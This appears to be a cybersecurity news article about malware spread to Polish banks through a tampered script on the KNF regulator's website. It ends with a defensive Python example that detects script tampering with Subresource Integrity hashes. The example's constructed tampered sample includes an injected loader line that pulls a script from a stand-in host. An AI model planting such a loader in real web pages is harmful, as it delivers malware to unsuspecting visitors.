Polish banks are investigating what is being considered the largest system hack in the country's history after malware was discovered on workstations across the Polish banking industry. Ironically, the infection originated from compromised servers at the Polish financial regulator, the KNF, itself. The KNF took its entire system offline after discovering the suspicious downloads that had infected various banking systems. The regulator has confirmed that its internal systems were compromised by foreign hackers.

The complete scenario

According to sources, an unidentified attacker controlled the KNF website for well over a week. They modified one of the JavaScript files on the regulator's site so that visitors loaded a malicious JavaScript file, which in turn downloaded malicious payloads. Once executed, the malware connected to remote servers to carry out hazardous activities such as data exfiltration and post-exploitation. In some cases, the attackers even managed to reach critical servers inside the targeted banks' infrastructure.

At least 20 banks have found their systems affected. During the initial stages of the infection, antivirus solutions were unable to detect the malware. The attack did not touch customers' savings. Information theft was a different matter, however, with several organisations reporting encrypted transfers of their data to unfamiliar servers. The resulting losses may well extend far beyond Poland's borders.

While the regulator KNF and the financial institutions look into the matter, the Polish bank association is keen to reassure customers that their money is safe with the banks and that the Polish banking industry is operating normally. This so-called watering hole technique is much more sophisticated than the previous Lazarus attacks, pointing to the effort hackers are putting into gaining malicious access to critical sites.

It is important to understand that, because banking systems around the world share common access points, standard protocols are not enough to prevent advanced cyber-attacks. The modern browsing environment, combined with a lack of defences, enables tampering with JavaScript and APIs. Hardened APIs working alongside sound infrastructure networking policies could therefore play a significant role in preventing such breaches in future. This broad-ranging hack will most probably go down as the worst cyber-attack on the Polish banking industry, with almost 20 banks already confirmed as malware victims and others still under investigation.
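The attack described above worked because a script on a trusted site was silently replaced. One defence a site operator can apply is to record an integrity value for every script at deploy time, publish it in the page's script tags (Subresource Integrity, so browsers refuse a modified file) and re-check served copies against that baseline. The following is an added example written for this article, not code from the KNF or the banks; the file bodies and the path /js/app.js are constructed samples.

```python
import base64
import hashlib
import hmac

# Constructed sample: the script the site is supposed to serve.
KNOWN_GOOD_JS = b"document.addEventListener('DOMContentLoaded', init);\n"
# Constructed sample: the same file with an injected loader appended, the
# kind of change a watering hole attack makes to a legitimate script.
TAMPERED_JS = KNOWN_GOOD_JS + (
    b"var s=document.createElement('script');"
    b"s.src='//example.invalid/x.js';document.head.appendChild(s);\n"
)


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return a Subresource Integrity value, e.g. 'sha384-<base64 digest>'."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_asset(content: bytes, expected: str) -> bool:
    """Check a served file body against the integrity value recorded at deploy time."""
    algo, _, _ = expected.partition("-")
    # Constant-time comparison so the check itself leaks nothing via timing.
    return hmac.compare_digest(sri_hash(content, algo), expected)


def script_tag(src: str, integrity: str) -> str:
    """Emit the <script> tag browsers will enforce the integrity value on."""
    return f'<script src="{src}" integrity="{integrity}" crossorigin="anonymous"></script>'


def check_baseline(baseline: dict, served: dict) -> list:
    """Return paths whose served body no longer matches the baseline (changed or missing)."""
    return [
        path for path, expected in baseline.items()
        if path not in served or not verify_asset(served[path], expected)
    ]


if __name__ == "__main__":
    baseline = {"/js/app.js": sri_hash(KNOWN_GOOD_JS)}
    print(script_tag("/js/app.js", baseline["/js/app.js"]))
    print("intact  :", check_baseline(baseline, {"/js/app.js": KNOWN_GOOD_JS}))
    print("tampered:", check_baseline(baseline, {"/js/app.js": TAMPERED_JS}))
```

Running the baseline check from a separate host on a schedule, rather than on the web server itself, means an attacker who alters the site cannot also alter the check.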

About The Author

"As a child, I was always looking at cyber security news because it interested me immensely. Growing up, I developed a habit of surrounding myself with other like-minded people and this helped shape me as a cyber security enthusiast. By constantly indulging in cyber security related forums, my love for the topic has snowballed."
